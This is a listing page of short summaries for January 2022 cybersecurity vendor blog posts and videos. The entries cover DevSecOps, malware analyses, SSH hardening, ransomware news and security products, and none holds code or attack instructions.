January 2022

Crossword Cybersecurity supports techUK's SME Membership with Cyber Essentials certification and access to Rizikon Assurance

Crossword Cybersecurity Plc is today announcing that its online software assurance platform, Rizikon Assurance, is being made freely available to members of UK technology trade association, techUK for a single-use cyber security assessment to support them towards Cyber Essentials certification.

DevSecOps in an Agile Environment

At first glance, DevSecOps and Agile can seem like different things. In reality, the methodologies often complement each other. Let’s see how. Agile is a methodology that aims to give teams flexibility during software development. DevSecOps is about adding automated security to an existing automated software development process. Both are methodologies that require high levels of communication between different stakeholders and continuous improvement as part of the process.

Key Criteria for Choosing Mobile App Security Solution Vendor

Mobile phone apps are more popular than ever with a rapidly expanding user base each year. They have literally made everything come to the fingertips of the users and there’s a significant demand for mobile apps for just about everything, generating great competition and pressure among app developers around the world.

NFTs - Protecting the investment

This blog was written by an independent guest blogger. Non-fungible tokens (NFTs) are the new player in the financial investment market. They’ve seen tremendous interest from a wide range of parties, whether that be institutional investors or retail hobbyists looking to find an angle. As with anything involving money, malicious actors are already starting to take hold; Insider magazine recently highlighted the 265 Ethereum (roughly $1.1 million) theft due to a fraudulent NFT scheme.

Threat intelligence outlook 2022: what we can learn from the past year

In this blog post, we discuss the key security issues of the last year and explore what this could mean for 2022. With the continuous exploitation of vulnerabilities which took place in 2021 likely to continue in 2022 and beyond, organisations can benefit from conducting tabletop exercises using some of the scenarios presented below.

CrowdStrike Powers MXDR by Deloitte, Offering Customers Risk Mitigation with Powerful Customized and Managed Security Services

Deloitte, a leader in managed security services, has launched MXDR by Deloitte — a Managed Extended Detection and Response suite of offerings — within which the CrowdStrike Falcon® platform will power a number of solutions. MXDR by Deloitte combines an integrated, composable and modular managed detection and response SaaS platform with managed security services in a unified offering of advanced, military-grade threat hunting, detection, response and remediation capabilities.

Mind the MPLog: Leveraging Microsoft Protection Logging for Forensic Investigations

In an incident response investigation, CrowdStrike analysts use multiple data points to parse the facts of who, what, when and how. As part of that fact-finding mission, analysts investigating Windows systems leverage the Microsoft Protection Log (MPLog), a forensic artifact on Windows operating systems that offers a wealth of data to support forensic investigations. MPLog has proven to be beneficial in identifying process execution and file access on systems.

How to Use SSH Agent Safely

The SSH agent (ssh-agent) is an SSH key manager that stores the SSH key in a process memory so that users can log into SSH servers without having to type the key’s passphrase every time they authenticate with the server. In addition to the key management feature, SSH agent supports agent forwarding, which helps to authenticate with servers that sit behind a bastion or jump server.

Bringing home the beacon (from Cobalt Strike)

Elastic Security engineers have documented a less tedious way to find network beaconing from Cobalt Strike. In their full analysis (), Elastic Security team researchers Andrew Pease, Derek Ditch, and Daniel Stepanic walk users through the Elastic fleet policy, how to collect the beacon, beacon configuration, how to analyze its activity, and how you can set it up in your organization’s environment.

How Lunar shifted security left while building a cloud native bank

At SnykCon 2021, there were a number of insightful talks from companies that were able to build successful AppSec programs. As the Lead Platform Architect at Lunar and a Cloud Native Computing Foundation (CNCF) ambassador, Kasper Nissen’s presentation was no exception. In this post, we’ll recap Nissen’s talk about how his security team at Lunar was able to shift security left while building a cloud native bank.

You Didn't Ask? Well, the SOC Evolution Answered Anyway

Let me begin by stating the obvious: The cyberattack surface is growing exponentially and diversely. Essentially, it’s a bigger shark and we’ve got the same small boat. The environments, platforms, services, regions and time zones that constitute modern enterprise operations and drive digital transformation for business continue to require increasing specialization and expertise beyond current in-house capabilities.

DevSecOps tool examples that will alleviate your workload

Nowhere is this more apparent than in DevSecOps where developers and releases outnumber security experts by thousands to one. It’s simply not feasible for the security teams to manually tackle flagged issues with any kind of accuracy—and have any time left in the day to - you know - eat and sleep!

Application Security in 2022 Misses the Big Picture

I recently ran an unofficial poll on LinkedIn asking how people found every instance of Log4J in their application portfolio. The options I gave were CMDB (Configuration Management Database), SBOM (Software Bill of Materials), SCA (Software Composition Analysis), and internal detective work. The overwhelming majority, 54% to be exact, said internal detective work. These results got me thinking as organizations spend millions of dollars a year on CMDB, SBOM, and SCA technologies.

Governance Test Drive

Ever wanted to try out Egnyte’s security and governance capabilities, in order to protect your company’s sensitive data more effectively? You can with Egnyte’s Governance Test Drive! To access Test Drive, navigate to Settings, Plan Details, and Change plan. Then select Open Secure and Govern Demo. Test Drive allows you to explore connected content sources with standardized data so you can see the impact of issues like Suspicious Logins, Unusual Access, and Probable Ransomware;

Intro to Torq: Chatbots

The challenges and workloads facing today’s security teams are not getting easier, but the response methods of security teams are still manual, utilizing a patchwork of security tools that are not connected nor communicating with each other. What if you could utilize your organization’s most common communication tool (i.e. Slack) to bring security communications and operations into every part of your organization?

Exploring influences on SSC grades for insurance companies

This blog was written by an independent guest blogger. There are more online stores and services available than ever, and you are able to shop for almost anything online whether it's groceries or insurance. There are many ways to protect yourself while browsing the internet, and one of those ways is to choose reputable businesses with strong security. Although there are standards for online businesses to follow, some have better safety measures in place than others.

How Penetration Testing Helps Cloud DLP

The market for penetration testing is expected to reach $3.1 billion by 2027, rising at a market growth of 12% CAGR during this time. Fueled by the rising number of mega-breaches and more sophisticated attacks, IT teams are taking a more proactive approach, using penetration testing to validate and improve their security configurations. As more organizations do business on SaaS and cloud programs, penetration testing is becoming an important complement to cloud data loss prevention tools.

Bringing human-centric security to everyone

As our online lives become subject to new and evolving threats, we’re doubling down on protecting the digital privacy and peace of mind of everyday people – at home and at work. 1Password has raised $620 million (USD) in the largest funding round ever for a Canadian company. Our latest round was led by ICONIQ Growth, with participation from other wonderful partners including Accel, Tiger Global, Lightspeed Venture Partners, and Backbone Angels.

Share Large Genomics Files With CROs To Support Clinical Programs

Increasingly, life science companies are applying omics-based testing to clinical trials. These tests support precision medicine models for the study of rare cancers and other diseases. Genomics research tests, for example, can help account for diverse drug responses and outcomes caused by genetic differences in trial participants.

Elastic Security verifies new destructive malware targeting Ukraine: Operation Bleeding Bear

Elastic Security has verified a new destructive malware targeting Ukraine: Operation Bleeding Bear. Over the weekend, Microsoft released details about this multi-stage and destructive malware campaign that the Ukrainian National Cyber Security Coordination Center has been referring to as Operation Bleeding Bear.

Enabling policy as code (PaC) with OPA and Rego

The Cambridge Dictionary defines a policy as: “a set of ideas or a plan of what to do in particular situations that has been agreed to officially by a group of people, a business organization, a government, or a political party.” And in the context of software development, your organization may have some rules about how a policy is built, configured, deployed, and used. Some examples of software policies include.

$6 Million Savings: How Rapid Insights Led To Valuable Network Upgrades

When a large government agency decided to refresh its infrastructure down to Layer 2 switches, Forward Networks data delivered over $6 million in savings. Like many companies around the world, this organization had challenges getting full visibility and the structure of its network, which had grown organically over time.

Explosion in E-Commerce Shines a Spotlight on Vulnerability Management in Retail

The retail sector has its own unique cybersecurity risks, especially given the growing emphasis on online commerce. The trend toward purchasing goods and services on the internet has been going on for years. But the volume of e-commerce has seen a sharp increase since the beginning of the pandemic, when many physical stores were forced to lock down or consumers simply opted to buy online rather than visiting brick-and-mortar locations.

Using Z3 Theorem Prover to analyze RBAC

Z3 is a satisfiability modulo theories (SMT) solver developed by Microsoft Research. With a description like that, you’d expect it to be restricted to esoteric corners of the computerized mathematics world, but it has made impressive inroads addressing conventional software engineering needs: analyzing network ACLs and firewalls in Microsoft Azure, for example.

What is CI/CD? A Complete Guide to CI/CD

Software development cycles have changed immensely in the last ten years. New practices and design philosophies are being tried every day. One of these practices is CI/CD pipelines, utilizing aspects of agile software development paired with automation and robust testing. In this post, we’ll be covering all aspects of CI/CD, as well as some popular CICD tools your organization can use to implement a CI/CD pipeline.

Why Your Organization Needs Comprehensive Security Operations

How prepared is your business to fend of bad actors seeking to infiltrate your network systems and breach your data? Imagine, if you will, the following scenario: It’s 5:30 am, and an employee has just clicked a malicious link in a phishing email. An attacker, armed with ransomware, has just gained access to your enterprise.

Bob Saget and open source license compliance

Unique open source licenses provide amusement for developers but they create extra work for legal teams overseeing a company’s IP. Several of my open source friends had the same reaction when they heard of the death of Bob Saget. Sadly, the actor/comedian passed away last week at a relatively young age, and with him went an increment of open source license risk. Wait… what?

Endpoint Detection and Response (EDR) for containers and Kubernetes - Sysdig Secure

The increasing number of yearly reported data breaches and new critical vulnerabilities, such as log4j, impacting both small and large businesses shows that cyberthreats are real and targeting everyone. You can minimize risk by implementing runtime security and having an incident response plan in place to contain attacks. But, in container environments, responding fast to incidents is challenging.

Technical Analysis of the WhisperGate Malicious Bootloader

On Jan. 15, 2022, a set of malware dubbed WhisperGate was reported to have been deployed against Ukrainian targets. The incident is widely reported to contain three individual components deployed by the same adversary, including a malicious bootloader that corrupts detected local disks, a Discord-based downloader and a file wiper. The activity occurred at approximately the same time multiple websites belonging to the Ukrainian government were defaced.

The Top 10 Cybersecurity Threats Impacting the Public Sector

From nation-state threat actors to typical cybercriminals, the public sector faces a multitude of cybersecurity threats. At the same time, public-sector organizations struggle to maintain a robust cyber hygiene posture because they need to balance limited budgets with complex IT environments and highly interconnected ecosystems.

Setting up a Kubernetes cluster

Kubernetes is an open-source platform for governing clusters of containerized application services. Kubernetes automates the vital aspects of container lifecycle management, including scaling, replication, monitoring, and scheduling. The central component of Kubernetes is a cluster, which is itself made up of multiple physical or virtual machines.

6 Things Cyber Insurers Are Looking for in Cyberattack Claim Applications

The modern digital environment is more risky than ever before, and the incidence of cyberattacks only increased throughout the COVID-19 pandemic. In this day and age, even the most robust security systems may still be penetrated or breached by a sophisticated cyber-attack. This means companies can no longer afford to be complacent about security.

Tips for Defending Against Adversarial Actions Regardless of Their Origin

When an unfortunate event occurs, people tend to be curious about who was responsible for the event. It can be interesting and helpful to know who your enemy is and what their motives might be. But in cybersecurity, the primary focus is ultimately on preventative and detective measures to avoid similar issues. Let’s use a recent example to illustrate this point below.

CloudCasa - How to Deploy CloudCasa on a Rafay Managed Cluster

With Rafay and CloudCasa, enterprises can manage and protect Kubernetes distributions and immediately gain centralized automation, security, visibility, data protection and governance capabilities for Kubernetes and application lifecycle management – across public clouds such as AWS, Azure and GCP.

A Day In The Life Of A Field CISO - Steve Kinman

CISO Journey What is a like CISO role? what was it like an operational ciso v/s a field ciso? like rght now we are talking only about log4j issues and how it would have been for you. What would have been your strategy? Have you seen other field Cxo’s? What is one Unique thing, you are trying to implement? How different is this role from a regular CISO?

Securing a World of Physically Capable Computers with Bruce Schneier

Computer security is no longer about data; it's about life and property. This change makes an enormous difference, and will shake up our industry in many ways. First, data authentication and integrity will become more important than confidentiality. And second, our largely regulation-free Internet will become a thing of the past.

Getting the best out of Samsung Knox management with Mobile Device Manager Plus

In case you missed it, Samsung Knox has verified Mobile Device Manager Plus as a Knox Validated Partner solution. This means that our EMM solution meets its business-level requirements for 2022, and that we support a wide range of features to help you get the best out of all your mobile devices that support Samsung Knox capabilities.

When It comes to Cybersecurity - An ounce of prevention

So, to what extent are we able to protect ourselves from Cybersecurity events? With the alphabet soup of acronyms out there such as NIST, ISO, SOC, CISA, DevSecOps, etc…… protecting your business from Cybersecurity threats can be overwhelming. Making Cybersecurity a priority can save your business down the road. Threat Actors, once in, may lay dormant for months much like a human virus.

How to access 70% of Wi-Fi networks in a residential neighborhood

Israeli cybersecurity researcher and analyst Ido Hoorvitch has published the results of an experiment he conducted on residential Wi-Fi networks and the findings were surprising: he was able to crack about 70% of the hashes from residential Wi-Fi networks in one Tel Aviv neighborhood.

Power the SOC of the Future with the DataLinq Engine - Part 3

In my first blog in this three-part series, we discussed the importance of data to the modern SOC, and the unique approach of ThreatQ DataLinq Engine to connect the dots across all data sources, tools and teams to accelerate detection, investigation and response.

Top 7 BFSI Cybersecurity Trends for the Year 2022 that you Need to Know

BFSI (Banking, Financial Service and Insurance) organizations have remained a primary target of cybercriminals over the last several years. Given the amount of sensitive data that the BFSI sector has to deal with, they become an obvious goldmine for hackers and that is why they have to prioritise cybersecurity above all else. As a matter of fact, more than 70% of fintech companies cited information security as their top concern in the Sixth Annual Bank Survey.

Snyk Code scanning added to the Snyk Visual Studio extension

Snyk Code provides a new generation of static application security testing (SAST). It uses a unique process that uses machine learning to rapidly grow its knowledge base and a Snyk security engineer to assure the quality of the rules. As a result, the Snyk Code knowledge base grows exponentially and results in an industry-leading high accuracy. On top of that, Snyk Code provides real-time scanning so developers can use it right from their favorite IDE.

Five Cryptography best practices for developers

Learn about the five cryptography best practices every developer should follow to secure their applications. Cryptography is a huge subject with dedicated experts, but that doesn’t mean developers can leave it entirely to their security teams. Building security into DevOps means you need to understand how to deliver secure, high-quality code at velocity. Having some basic cryptography under your belt will help.

Vulnerable AWS Lambda function - Initial access in cloud attacks

Our security research team will explain a real attack scenario from the black box and white box perspective on how a vulnerable AWS Lambda function could be used by attackers as initial access into your cloud environment. Finally, we show the best practices to mitigate this vector of attack. Serverless is becoming mainstream in business applications to achieve scalability, performance, and cost efficiency without managing the underlying infrastructure.

A CISO's Point of View on Log4j

No sooner did word start to spread about Apache Log4j that the usual torrent of blaring headlines, vendor marketing, and tips and tricks-style “information” quickly followed. You can find plenty of solid technical analysis out there about Log4j, and we’ve already posted information about Netskope protections and threat coverage from Netskope Threat Labs. But that’s not this post.

Distributed Tracing with Datadog

Here at Nightfall we ensure that we are always using the most appropriate technology and tools while building services. Our architecture involves serverless functions, relational and NoSQL databases, Redis caches, Kafka and microservices written in Golang and deployed in a Kubernetes cluster. To effectively monitor and easily troubleshoot our services, we use distributed tracing across our services.

Combatting Insider Threats in Remote Learning Environments Introduction

Remote learning is now an inevitable reality for academic institutions. Even before the pandemic, remote learning was on the rise. The pandemic has only made that trend more pervasive and dominant across institutions, most notably among the public schools. The Multi-State Information Sharing and Analysis Center (MS-ISAC), a federally funded threat intelligence and cybersecurity advisory organization, recorded a 19% increase in cyberattacks targeting K-12 schools in the 2019-2020 school year.

What Is Enterprise Information Security Architecture?

Spending on security and risk management is soaring worldwide. But exactly which improvements should you focus on next to best strengthen your cybersecurity program? For many organizations, building a solid information security architecture should be at the top of the list. Read on to learn how what information security architecture is and how it can help you protect your critical IT assets from security threats with less work and worry.

How to Fulfill Multiple Compliance Objectives Using the CIS Controls

Earlier this year, I wrote about what’s new in Version 8 of the Center for Internet Security’s Critical Security Controls (CIS Controls). An international consortium of security professionals first created the CIS Controls back in 2008. Since then, the security community has continued to update the CIS Controls to keep pace with the evolution of technology ecosystems and emerging threat vectors—all the way to Version 8 and the 18 Controls contained therein.

Designing a 100-Day Sprint for OT Cybersecurity: What to Consider

As we begin a new year, many organizations will enter a “goal-setting and strategic planning” season. During this time, individuals are re-energized and motivated to record new accomplishments for their professional development. Traditional corporate goal setting aligns with fiscal calendars and forces companies and individuals to build goals in chunks of 365 days. But why set your deadline based on the Earth’s orbital period?

How Marketers Use Egnyte

Chief Marketing Officer David Spitz showcases how he uses Egnyte while working on the go. This video shares how to transition between offline and in-cloud work, co-edit with Google Workspace and Microsoft Office and create folder and document templates. Whether it's an urgent press release, ad copy, or an analyst briefing, you can collaborate with team members and stay on top of tasks all within Egnyte.

How to use DevSecOps to reduce and focus issues raised?

One of the biggest challenges when rolling out a DevSecOps process is the volume of issues it can bring to light. From a development point of view, we don’t want the implementation of security in DevOps to give the dev team massive lists of vulnerabilities to check over on every build or release. We want to avoid anything that might cause unforeseen delays to keep everything on track - but we also want the application to be secure.

How to measure security metrics & continuous improvement in DevSecOps?

Many security departments and management teams want to improve their processes. DevSecOps introduces the ability for much more granular measurements than traditional manual security testing. Even simple measures can highlight gaps and areas for improvement where the budget can be spent. In this video Founder and CSO, Gary Robinson, takes a closer look at the challenges of KPI metrics for software testing.

The Big Fix 2022 - Getting Started Guide

The Big Fix brings together developers, DevOps, and security practitioners of all skill levels to help make the internet more secure. Our goal is to make security 100x better in 2022 by finding and fixing 202,200 security vulnerabilities! Join us to help find (and fix!) security vulnerabilities while making friends and winning swag. In this short video we'll help you get started finding (and fixing!) security vulnerabilities in your applications -- it's easy!

Introduction to Advanced Analytics (Part 2)

Start building dashboards and widgets using the tools in Explore - Part 2 Netskope, the SASE leader, safely and quickly connects users directly to the internet, any application, and their infrastructure from any device, on or off the network. With CASB, SWG, and ZTNA built natively in a single platform, Netskope is fast everywhere, data-centric, and cloud smart, all while enabling good digital citizenship and providing a lower total-cost-of-ownership.

Live Hacking: Find Vulnerabilities in Your Apps Before Hackers Do

As cloud-native technologies disrupt the Application Security (AppSec) market, forward-thinking enterprises are shifting their security to the left. A range of cutting-edge security platforms is now available, empowering developers to build secure applications within the development process. But what do secure applications look like, and why does it matter? Why are enterprises implementing security during the deployment phase?

Benefits of Cyber Security: Importance for Businesses and Individuals

Cyber security is a crucial element of the digital age. You may not notice it, but cyber attacks are happening every day to companies and individuals alike. We’ve got you covered with this detailed guide on the importance and benefits of cyber security along with the mitigation strategies and tips for protection against cyber attacks.

The THIP Model: Embedding Emotional Intelligence in Third-Party Risk Management

Third-party risk management (TPRM) has grown in prominence as organizations increase their reliance on external parties, from cloud providers to credit card processors. As more enterprises invest in this critical business function, certain best practices are becoming key to a successful TPRM program.

How to keep your business secure during the Great Resignation

Millions of workers are leaving their jobs after enduring stay-at-home lockdowns and reflecting on what they need to be truly happy and healthy. While the ‘Great Resignation’ could have a positive impact on society, it also represents a security risk for businesses of all sizes.

Running Kubernetes on AWS Fargate

For the last decade, AWS has dominated the cloud computing space with a plethora of cloud services. One of AWS’ great innovations was AWS Fargate, their first containers as a service (CaaS) offering. Prior to the introduction of Fargate, those building in the cloud were forced to choose between IaaS paradigm-focused containers or FaaS-focused serverless functions.

Latest FBI Warning: Don't Trust Thumb Drives

The FBI recently warned and advised on a current scam in which bad actors mail malicious thumb drives in packages and trick recipients into thinking there is a legitimate reason for connecting the thumb drive to their computer. Let’s be clear. DON’T. Don’t stick that thing in your computer. You don’t know where it’s been!

The Supply Chain Needs Better Cybersecurity and Risk Management

The supply chain is under a historic amount of pressure, but the strain on its cybersecurity and risk management may be in even worse condition. As 2021 draws to a close, the global supply chain is in a state comparable to rush-hour traffic in bad weather. Everything seems to be backed up whether due to supply and demand issues, wait times at shipping ports, or any number of other delays.

Cybersecurity Statistics of 2021 & Predictions for 2022

Now is a great time to look back on cybersecurity statistics for 2021. They can help IT professionals understand which issues from last year may carry over into 2022. However, it’s also useful to gain expert insights on likely cybersecurity scenarios impacting this year. Knowing about threats makes it easier to combat them. Here are 10 cybersecurity statistics from 2021 and five predictions for 2022.

California Consumer Privacy Act (CCPA) Compliance: What you need to know to be compliant

The California consumer privacy act (CCPA) is a law that was passed in 2018, and it is in effect from January 1st 2020. The California attorney general’s office has not taken any enforcement action against firms that did not meet the standards until July 1st 2020. A lot of people are unsure about what this new law means for them. Like the GDPR, there are significant penalties for non-CCPA compliance and potential loss of consumer loyalty.

Managed Security Awareness: Beyond the Breach | Ransomware Infected Thumb Drives

The FBI has warned of a FIN7 cybercrime campaign in which attackers mail USB thumb drives to American organizations with the goal of delivering ransomware into their environments. Our latest Arctic Wolf Managed Security Awareness session, Beyond the Breach, breaks down what to look for and how to respond, shares background on this new cybercrime, and offers guidance on how to protect your organization.

MDR or MSSP? A Comparison Guide

In today's hyper-connected world, cyberattack risks have never been more pronounced. Threat actors continue to develop malicious, ingenious tricks and techniques to stay one step ahead of security systems and response specialists. As a result, a more focused and proactive approach to detecting, investigating, and responding to threats is required. In this guide, we break down the comparison between Managed Detection and Response (MDR) and Managed Security Services (MSS) and how to determine what to look for in providers.

Security Service Edge (SSE) For Dummies

Grab your copy of the first ever book on SSE Security Service Edge (SSE) is described by Gartner as the security stack of services within a SASE architecture. SSE is fast, easy to use, and secures your business wherever your people and data go. In this book, you'll: Download the very first SSE For Dummies book on the market where we cut through the acronyms to give you a functional understanding of how this set of tools will impact your security going forward.
Image

Database Security in a Zero Trust Architecture

It is no secret that many organizations can do better with their security programs. Zero Trust allows for an evolution of an organization's strategy. It also forces organizations to rethink their approach to securing data to meet the requirements of data privacy regulations and expectations from their customers and business partners. Risk-minded organizations take the Zero Trust mindset and adopt it as best they can to fit their current and future state infrastructure.

Web Application Penetration Testing: Introduction And Benefits

Web application pen testing is the act of analysing a web application through the perspective of an attacker in order to identify potential vulnerabilities and provide feedback on how to improve security. This video will cover what Web Application Pen Testing is, the benefits it provides, and some common vulnerabilities that are identified during this process.

Weekly Cyber Security News 14/01/2022

A selection of this week’s more interesting vulnerability disclosures and cyber security news. For a daily selection see our twitter feed at #ionCube24. In an act of ‘revenge’ or retaliation against the unpaid or even unaccredited use of FOSS by commercial entities, one developer did something that has created a large amount of discussion (which is a good thing) but at what cost?

Complete Guide to Common Cloud Misconfigurations and How to Avoid Them

Companies are increasingly moving their IT operations to IaaS (infrastructure-as-a-service) solutions. Gartner estimates that by 2022, about 60% of business entities will be leveraging cloud-managed offerings, doubling the recorded use in 2018. Cloud offerings like Amazon Web Services (AWS) are generally secure. But since IaaS uses a shared security model, there's a great chance of data security issues, including cybersecurity and workload concerns.

How Vulnerability Management Secures Supply Chain and Production in Manufacturing

Manufacturing is one of those industries that seems like a natural fit for vulnerability management, in part because these companies can be such easy targets for cyber criminals. Manufacturers in many cases operate far-flung, global facilities including factories, warehouses, and other distribution points. Increasingly, these different facilities are connected as companies look to modernize their operations through digital transformation.

Vulnerability Management Keeps Systems Running in Critical Infrastructure

Assessing the security risks of critical infrastructure organizations is a bit of a challenge, because the category includes multiple industries. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), which leads the nation’s effort to manage and reduce risk to cyber and physical infrastructure, identifies 16 critical infrastructure sectors.

SSH Hardening Tips to Prevent Brute-Force Attacks

SSH servers are a common target for brute-force attacks. This is even more true if your infrastructure sits behind an SSH bastion because attackers have no choice but to compromise the bastion host either by exploitation or denial of service. In this article, we will list a few controls which will help you harden your SSH servers from brute- force attacks.

Arctic Wolf Joins Gartner Peer Insights Customer First Program

Arctic Wolf joins the Gartner Peer Insights Customer First Program in the vulnerability assessment and managed detection and response service. The members of the Arctic Wolf team are excited to announce that we have pledged to be a Customer First vendor in the vulnerability assessment and managed detection and response service. Our team at Arctic Wolf takes great pride in this program commitment, as customer feedback continues to be a critical priority and shapes our products and services.

1Password's 2021 year in review - everything you might have missed

If year-end reviews have taught us anything, it’s that people love recaps that cram 12 months of growth and change into a five minute digestible read. Last year we worked hard to bring easy but secure password management to everyone – businesses and individuals alike.

How To Protect and Store Sensitive Data in SaaS Platforms with Cloud DLP

Mega-breaches, or reported breach incidents that impact more than one million records, have increased dramatically. Our analysis shows that, on average, mega-breaches increased 36% year over year since 2016. In total, mega-breach incidents that we analyzed cost at minimum a combined $8.8 billion and exposed 51 billion records.

Cloud Threats Memo: Exploiting Legitimate Cloud Services for Command and Control

Welcome to the first edition in 2022 of our Cloud Threats Memo! One of the key findings of our Cloud and Threat Report – January 2022 is the leadership of Google Drive as the most exploited cloud app for the distribution of malware (and for the record, guess which service ranks at number two—spoiler alert: it is a cloud storage service from Microsoft). Unsurprisingly, this is not the only way in which threat actors can exploit these and other cloud services.

Russia's FSB Takes Down REvil Cyber Gang in an Unprecedented Series of Raids

Reuters reported on Friday that the Russian Federal Security Service (FSB) and local police launched a series of raids against members of the REvil/Sodinokibi ransomware gang at the request of the United States. More than a dozen arrests were made with millions in cash and goods being confiscated by authorities. This unprecedented action from the Russian Federal Security Service aligns with the fear that we've observed while conducting cybercriminal chatter reconnaissance on the Dark Web.

How Should Organizations Tackle Their Data Privacy Requirements?

Data is among the most valuable assets that need to be safeguarded at all costs. But in the digitally-driven business world, cybercrimes are prevalent, making data protection and data privacy a main focal point. The increasing use of technology and the growing exposure to evolving cyber threats have dramatically changed the data security and privacy landscape. For these reasons, international regulatory bodies around the world have created stringent data privacy laws for businesses to meet.

Why Is It Important to Invest in OT Cybersecurity for 2022?

As we enter 2022, it’s important that organizations invest in cybersecurity for their operational technology (OT) systems. Why? One of the reasons is that Industry 4.0 can sometimes introduce more risk for OT. This is evident in several Industry 4.0 market trends. For example, there’s digital twin infrastructure. That’s where you make a digital copy of your production facility or your machine.

Approaching Linux Post-Exploitation with Splunk Attack Range

With the recent release of Sysmon (System Monitor) for Linux by Microsoft, new opportunities for monitoring, detection development, and defense are now possible. Sysmon for Windows is a very popular tool among detection developers and blue teamers as it provides extensive details from system activity and windows logs. Due to the extensive information this service/driver provides in Microsoft Windows, it is very useful when researching attacks and replicating malicious payloads on lab machines.

How fraudsters bypass MFA to get into banks, brokers and crypto wallets

Passwords are dying as a sole security measure, particularly within financial services. It is widely expected (and in the UK, mandatory) that any institution responsible for finances, from banks to brokers and even crypto wallets, should be implementing multi factor authentication (MFA) to prevent fraudsters gaining access to accounts using automated attacks, even if they know the user’s password.

What Are BlackMatter Ransomware Attacks?

Following the 2021 cyberattack on Colonial Pipeline that caused a nationwide supply-chain disruption, numerous cybersecurity companies and federal agencies increased their efforts to find and shut down ransomware groups and curb the rise of cyberattacks. Those efforts have resulted in the shutdown of ransomware-as-a-Service (RaaS) groups such as DarkSide and REvil, which had been targeting critical infrastructure including healthcare providers of financial systems.

Egress Defend

Stop targeted email attacks with Egress Defend. We combine zero-trust models with intelligent linguistic and contextual analysis to detect the sophisticated cyberattacks that bypass your traditional email security solutions. Our real-time alerts and feedback provide teachable moments that clearly explain risk to users. This provides active learning that augments your security awareness training programs and builds a first line of defense against threats.

Egress Prevent

Stop email data loss with Egress Prevent Prevent uses social graph and contextual machine learning technologies on desktop and mobile to accurately model user relationships. We then detect anomalous recipients in real time to avoid a damaging data breach. Importantly, we also supervise our machine learning algorithms with policies so Prevent can immediately detect more outbound risks, such as wrong attachments, conflicts of interest, data exfiltration, and weak TLS certificates.

Egress Protect

Make sending encrypted emails easy with Egress Protect. Our simple controls combined with gateway encryption, means you can send and revoke sensitive emails and large files securely. Maintaining your compliance and removing risk. Our flexible authentication techniques remove friction and even allow trusted recipients seamless access to sensitive emails without having to log into a separate secure portal.

Egress Secure Workspace

Easily share confidential data with Egress Secure Workspace. Our encrypted environment offers enterprise-grade permissions at the click of a button. This enables employees to control how teammates and external partners interact with files to keep sensitive content secure. Secure Workspace can be used to share files of any size or format, and users can set controls to limit when and where recipients can access information, and what they can do with it. Robust anti-virus checks, and accredited security frameworks provide additional protection.

Quick Tour and Creating a Report from Explore

Learn how to create a report from the Explore menu. Netskope, the SASE leader, safely and quickly connects users directly to the internet, any application, and their infrastructure from any device, on or off the network. With CASB, SWG, and ZTNA built natively in a single platform, Netskope is fast everywhere, data-centric, and cloud smart, all while enabling good digital citizenship and providing a lower total-cost-of-ownership.

Looking back: Analyst recognitions in 2021

The year 2021 started off with organizations slowly reopening their doors and welcoming back their employees. This couldn’t happen overnight, of course. It meant devising new IT strategies to accommodate a hybrid workforce. Ensuring the organization’s business continuity is crucial for it’s sustenance, and this became the IT department’s primary mission.

Appknox Research reveals 91% of Fintech Apps Fail Basic Security Tests

The unexpected and rapid switch from the global workforce to the WFH setup caused by the coronavirus pandemic has prompted companies around the world to make extensive infrastructure adjustments to support employees working exclusively from home. According to the new IDC forecast, the number of mobile workers in the US will steadily increase from 78.5 million in 2020 to 93.5 million in 2024 over the next four years.

Zero Trust Integrations Are Expanding in the CrowdStrike Partner Ecosystem

Organizations need to stay ahead of the ever-evolving security landscape. It’s no secret that Zero Trust security is crucial for successful endpoint protection. Due to the rapid transition to a remote workforce and shift from the traditional data center into dynamic cloud infrastructure we’ve witnessed in the last year, more and more companies are finding the need to accelerate their digital transformation to keep pace with the expanding threat surface.

Identifying beaconing malware using Elastic

The early stages of an intrusion usually include initial access, execution, persistence, and command-and-control (C2) beaconing. When structured threats use zero-days, these first two stages are often not detected. It can often be challenging and time-consuming to identify persistence mechanisms left by an advanced adversary as we saw in the 2020 SUNBURST supply chain compromise. Could we then have detected SUNBURST in the initial hours or days by finding its C2 beacon?

CISA Says: Generate and Audit a Software Bill of Materials (SBOM) to prepare for the next Log4j

Following the devastating vulnerabilities recently found in Log4j, the Cybersecurity & Infrastructure Security Agency (CISA) in the United States has pointed to the SBOM – called for in President Biden’s cybersecurity Executive Order (EO) – as a way to make remediation of similar vulnerabilities easier in the future. In light of this, we thought it would be useful to provide an easy overview of SBOMs – what they are, and how to obtain them.

Announcing Security Service Edge (SSE) for Dummies, the Industry's First SSE Book!

Security Service Edge (SSE) describes the evolving security stack crucial to a Secure Access Service Edge (SASE) journey, with core platform requirements that include CASB, SWG, and ZTNA capabilities. SASE is an architecture—really, a long-term journey that will change how we all think about security and networking. But SSE, as part of SASE, is a set of cloud-delivered security services you can acquire and make the most of today.

Malicious USB drives are being posted to businesses

A notorious cybercrime gang, involved in a series of high profile ransomware attacks, has in recent months been sending out poisoned USB devices to US organisations. As The Record reports, the FBI has warned that FIN7 – the well-organised cybercrime group believed to behind the Darkside and BlackMatter ransomware operations – has been mailing out malicious USB sticks in the hope that workers will plug them into their computers.

Styra 2021 Year in Review

It’s been a whirlwind year for Styra — from going fully remote as a company to raising $40 million in Series B Funding to more than doubling our workforce. We have a lot to be thankful for as a company, and before we say “goodbye” to 2021 and “hello'' to 2022, I wanted to take a moment to recap some of my favorite moments and initiatives of this past year.

Linux-Targeted Malware Increases by 35% in 2021: XorDDoS, Mirai and Mozi Most Prevalent

Malware targeting Linux-based operating systems, commonly deployed in Internet of Things (IoT) devices, have increased by 35% in 2021 compared to 2020, according to current CrowdStrike threat telemetry, with the top three malware families accounting for 22% of all Linux-based IoT malware in 2021.

SSH Bastion Host Best Practices

SSH bastion hosts are an indispensable security enforcement stack for secure infrastructure access. Every security compliance standard that deals with remote infrastructure access (e.g., FedRAMP AC-17 - Remote Access, HIPAA §164.312(a)(1) - Access control, SOC2 CC6.1 - Manage Points of Access) mandates preventing direct network access to the servers and APIs.

MSP: What role does AI play in cybersecurity?

Artificial intelligence (AI) is playing an increasingly important role in cybersecurity. This is confirmed by a recent Pulse survey of 191 senior executives from companies on four continents: two out of three organizations (68%) say they are using tools that use AI technologies and among those who are not yet using AI, 67% are considering adopting it.

Small Talk: why cybersecurity matters beyond the office

